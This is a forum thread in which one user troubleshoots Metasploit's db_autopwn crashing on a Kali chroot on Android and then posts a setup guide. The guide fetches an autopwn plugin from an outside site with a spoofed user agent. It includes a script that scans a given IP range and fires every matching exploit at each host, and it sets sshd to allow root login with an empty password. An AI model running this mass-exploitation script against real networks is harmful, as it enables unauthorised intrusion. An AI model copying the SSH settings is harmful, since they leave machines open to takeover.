db_autopwn msfconsole Killed



operat0r
2013-08-20, 00:29
UPDATE: I got an S4 running Gummy 4.4.2 / Kali armhf running fine. Something with the mod or the phone was just too low to handle it .. video coming soon

* ya that's right I'm running db_autopwn ;P
* I forkbomb and it seems to run and never get killed ;P
* I had this issue with ruby before when a system runs out of RAM; this does not appear to be the case. I still think it is a RAM issue but nothing in dmesg. I think it is Android OS killing it for some reason. I can install packages and fork bomb without it getting killed
* metasploit v4.7.0-2013081401 [core:4.7 api:1.0]
* Linux localhost 2.6.35.14-cyanogenmod #1 PREEMPT Mon Nov 26 06:41:27 EST 2012 armv7l GNU/Linux
* armhf
* it dies in different places so it has something to do with max threads or ram etc



(65/112 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.151:445...
(66/112 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.151:445...
(67/112 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.151:445...
/usr/local/sbin/AP: line 10: 12937 Killed /usr/share/metasploit-framework/msfconsole -r ~/msf.rc


maybe something with ulimit ?


root@localhost:/home/android# ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 40
file size (blocks, -f) unlimited
pending signals (-i) 2919
max locked memory (kbytes, -l) 65536
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 8192
cpu time (seconds, -t) unlimited
max user processes (-u) 2919
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited

operat0r
2013-08-21, 05:13
tried within MSF before autopwn to run:



ulimit -s unlimited
ulimit -l unlimited
ulimit -n 50000
ulimit -q unlimited
ulimit -e unlimited
ulimit -i unlimited
ulimit -u unlimited
ulimit -c unlimited

no luck still gets killed randomly
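
Added example, not part of the original posts: a `ulimit` call changes only the shell that runs it and whatever that shell starts afterwards, so the limits that matter are the ones the kernel records for the running process in /proc/<pid>/limits. The function names are hypothetical and the script assumes a Linux /proc.

```shell
#!/bin/sh
# Added example, not code from the thread. Linux only: reads /proc/<pid>/limits.

# Print the soft value of one limit as the kernel records it for a process.
# $1 = PID, $2 = limit name exactly as written in /proc/<pid>/limits.
proc_soft_limit() {
    awk -v name="$2" '
        index($0, name) == 1 {
            rest = substr($0, length(name) + 1)
            split(rest, field, " ")
            print field[1]
            found = 1
        }
        END { exit(found ? 0 : 1) }
    ' "/proc/$1/limits"
}

# Set the open-files soft limit to $1 inside a child shell, then read this
# shell's own limit back from /proc. Prints "child=<n> parent=<n>".
child_vs_parent_nofile() {
    child=$(sh -c "ulimit -S -n $1 && ulimit -S -n")
    parent=$(proc_soft_limit "$$" "Max open files")
    echo "child=$child parent=$parent"
}

# Report the limits the thread tries to raise, for an already running PID.
limits_report() {
    for name in "Max open files" "Max processes" "Max stack size" \
                "Max locked memory" "Max pending signals"; do
        printf '%-20s %s\n' "$name" "$(proc_soft_limit "$1" "$name")"
    done
}

# With a PID argument, show that process's limits; without one, show this shell's.
limits_report "${1:-$$}"
child_vs_parent_nofile 256
```

Run it with the PID of the process that keeps dying to see the limits it actually has. A SIGKILL sent by the kernel's low-memory handling is not governed by any of these limits.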

operat0r
2014-01-01, 19:38
So I got an S4 running Kali ArmHF and Autopwn seems to run ok, having some little issues with msf meterpreter connections

operat0r
2014-03-01, 03:15
Ok so tried new armel and armhf .. won't even mount in linux deploy ... I think the files are different

Kali.old.img is the working image



$ file *
Kali.img: x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 12619776 sectors, code offset 0xb8
Kali.old.img: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=f48e90ef-167c-433b-8aca-ae80ce014c7e (extents) (large files) (huge files)
kali-linux-1.0.6-armhf.img: x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 11505664 sectors, code offset 0xb8



Here is the output of linux deploy .. it can't even download the image ..


[22:32:54] + [ file == partition ]
[22:32:54] + msg done
[22:32:54] + echo done
[22:32:54] + [ file == file ]
[22:32:54] + [ 0 -eq 0 ]
[22:32:54] + [ -f /data/sdext2/Kali.img ]
[22:32:54] + stat -c %s /data/sdext2/Kali.img
[22:32:54] + FILE_SIZE=4293918720
[22:32:54] + dirname /data/sdext2/Kali.img
[22:32:54] + DIR_NAME=/data/sdext2
[22:32:54] + stat -c %s -f /data/sdext2
[22:32:54] + BLOCK_SIZE=4096
[22:32:54] + stat -c %a -f /data/sdext2
[22:32:54] Making new disk image (4095 MB) ... + AVAILABLE_SIZE=1648172
[22:32:54] + let AVAILABLE_SIZE=(4096*1648172)+4293918720
[22:32:54] + let IMG_SIZE=(11044831232-11044831232/10)/1048576
[22:32:54] + [ 9479 -gt 4095 ]
[22:32:54] + IMG_SIZE=4095
[22:32:54] + msg -n Making new disk image (4095 MB) ...
[22:32:54] + echo -n Making new disk image (4095 MB) ...
[22:32:55] + set -e
[22:32:55] + dd if=/dev/zero of=/data/sdext2/Kali.img bs=1048576 seek=4095 count=0
[22:32:55] 0+0 records in
[22:32:55] 0+0 records out
[22:32:55] 0 bytes (0 B) copied, 6.1035e-05 s, 0.0 kB/s
[22:32:55] + exit 0
[22:32:55] done
[22:32:55] + [ 0 -eq 0 ]
[22:32:55] + msg done
[22:32:55] + echo done
[22:32:55] + [ file == file -o file == partition ]
[22:32:55] + cat /proc/filesystems
[22:32:55] + grep ext4
[22:32:55] Making file system (ext4) ... + [ -n ext4 ]
[22:32:55] + fs_support=ext4
[22:32:55] + break
[22:32:55] + [ -z ext4 ]
[22:32:55] + [ auto == auto ]
[22:32:55] + FS_TYPE=ext4
[22:32:55] + msg -n Making file system (ext4) ...
[22:32:55] + echo -n Making file system (ext4) ...
[22:32:55] + set -e
[22:32:55] + losetup
[22:32:55] + grep /data/sdext2/Kali.img
[22:32:55] + true
[22:32:55] + is_loop=
[22:32:55] + cat /proc/mounts
[22:32:55] + grep /data/sdext2/Kali.img
[22:32:55] + true
[22:32:55] + is_raw=
[22:32:55] + [ -z -a -z ]
[22:32:55] + mke2fs -qF -t ext4 -O ^has_journal /data/sdext2/Kali.img
[22:32:55] ext2fs_check_if_mount: Can't check if filesystem is mounted due to missing mtab file while determining whether /data/sdext2/Kali.img is mounted.
[22:33:05] + exit 0
[22:33:05] + [ 0 -eq 0 ]
[22:33:05] + msg done
[22:33:05] + echo done
[22:33:05] + return 0
[22:33:05] + [ 0 -ne 0 ]
[22:33:05] + msg Mounting partitions:
[22:33:05] + echo Mounting partitions:
[22:33:05] + mount_system root
[22:33:05] + [ 1 -eq 0 ]
[22:33:05] + [ 1 -gt 1 ]
[22:33:05] + msg -n / ...
[22:33:05] + echo -n / ...
[22:33:05] + cat /proc/mounts
[22:33:05] + grep /data/local/linux/mnt
[22:33:05] + is_mnt=
[22:33:05] + [ -z ]
[22:33:05] + [ ! -d /data/local/linux/mnt ]
[22:33:05] + [ -d /data/sdext2/Kali.img ]
[22:33:05] + MNT_OPTS=rw,relatime
[22:33:05] + mount -o rw,relatime /data/sdext2/Kali.img /data/local/linux/mnt
[22:33:05] done
[22:33:05] Mounting partitions:
[22:33:05] / ... done
[22:33:05] Installing Debian-based distribution:
[22:33:05] + [ 0 -eq 0 ]
[22:33:05] + msg done
[22:33:05] + echo done
[22:33:05] + return 0
[22:33:05] + [ 0 -ne 0 ]
[22:33:05] + msg Installing Debian-based distribution:
[22:33:05] + echo Installing Debian-based distribution:
[22:33:05] + BASIC_PACKAGES=locales,sudo,man-db
[22:33:05] + [ -z ]
[22:33:05] + DEBOOTSTRAP_DIR=/data/local/linux/deploy/debootstrap
[22:33:05] + export DEBOOTSTRAP_DIR
[22:33:05] + debootstrap --no-check-gpg --arch armhf --foreign --extractor=ar --include=locales,sudo,man-db kali /data/local/linux/mnt http://http.kali.org/kali
[22:33:05] I: Retrieving Release
[22:33:05] E: Failed getting release file http://http.kali.org/kali/dists/kali/Release
[22:33:05] + [ 1 -ne 0 ]
[22:33:05] + return 1
[22:33:05] + msg <<< end: install
[22:33:05] + echo <<< end: install
[22:33:05] <<< end: install
[22:33:05] + exit

operat0r
2014-03-01, 23:10
https://github.com/meefik/linuxdeploy/issues/102#issuecomment-36440054 worked for me: moving linux deploy wget to wget.old and after that clicking the install button



Setup:

* T-Mobile T759 (Samsung Galaxy S4)
* Gummy-2.1-12-18-13-NIGHTLY-jfltetmo
* 16gig card formatted first fat32 8.5gig and ext2 7.3gig ( using Link2SD on appstore to mount the ext2 part)

Reference:
https://forums.kali.org/showthread.php?18379-db_autopwn-msfconsole-Killed
https://github.com/meefik/linuxdeploy/issues/102#issuecomment-36440054

Video:
http://rmccurdy.com/scripts/videos/rmccurdy_com/Linux_Deploy_KitKat_Android_Metasploit_Autopwn.mp4


# Looks I did not setup like you can use FAT32 and still have a gig or so free. so I will most likely go back to normal FAT32 single part
/data/sdext2/Kali2.img Kali2.img (4293918720 bytes in 873.174s)

* install linux deploy
* select Kali
* leave the size to auto if you like or set the size and path to above 4gig to what ever Link2SD mounted your other ext2 partition to see below for 4+gig image
* before you click install I had to remove the app's wget and use my native wget
mv /data/local/linux/bin/wget /data/local/linux/bin/wget.old
* installs normally, I enable ssh only.. login android password changeme
* apt-get install metasploit screen -y

* allow blank root login.. vi /etc/ssh/sshd_config ... /etc/init.d/ssh restart
PermitEmptyPasswords yes
PermitRootLogin yes
#UsePAM yes
PasswordAuthentication yes

* stop postgres
/etc/init.d/postgresql stop
* start postgres
su postgres -c "/usr/lib/postgresql/9.1/bin/postgres -D /etc/postgresql/9.1/main/" &

* you may not need the above step .. I had issues before with postgres starting
* create msf user
su postgres -c "createuser msf -P"
* get autopwn script
wget -U notwgetiblockit -O /usr/share/metasploit-framework/plugins/db_autopwn.rb 'http://rmccurdy.com/scripts/db_autopwn.rb'

* Autopwn script for Kali put in /usr/local/sbin/AP
* usage AP 192.168.1.1-255
-------
# set ulimit to 50K not 1024

# stop postgres
/etc/init.d/postgresql stop
sleep 3

# start postgres
su postgres -c "/usr/lib/postgresql/9.1/bin/postgres -D /etc/postgresql/9.1/main/" &
sleep 20


# drop and create DB
su postgres -c "dropdb msf;createdb --owner=msf msf"

ulimit -s unlimited
ulimit -l unlimited
ulimit -n 50000
ulimit -q unlimited
ulimit -e unlimited
ulimit -i unlimited
ulimit -u unlimited
ulimit -c unlimited



# load db_autopwn.rb ,connect , run nmap,autopwn
echo "load db_autopwn" > ~/msf.rc
echo "sleep 5" >> ~/msf.rc
echo "db_connect msf:msf@127.0.0.1/msf" >> ~/msf.rc
echo "sleep 5" >> ~/msf.rc
echo "db_nmap -p 445 $1" >> ~/msf.rc
echo "sleep 5" >> ~/msf.rc

echo bash -c \'ulimit -s unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -l unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -n 50000\' >> ~/msf.rc
echo bash -c \'ulimit -q unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -e unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -i unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -u unlimited\' >> ~/msf.rc
echo bash -c \'ulimit -c unlimited\' >> ~/msf.rc


echo "db_autopwn -p -t -e -v " >> ~/msf.rc



/usr/share/metasploit-framework/msfconsole -r ~/msf.rc
-------






For large 4+gig image
* setup fat32 as first and ext2 as second
* use Link2SD to auto mount both partitions
* my path was /data/sdext2/Kali.img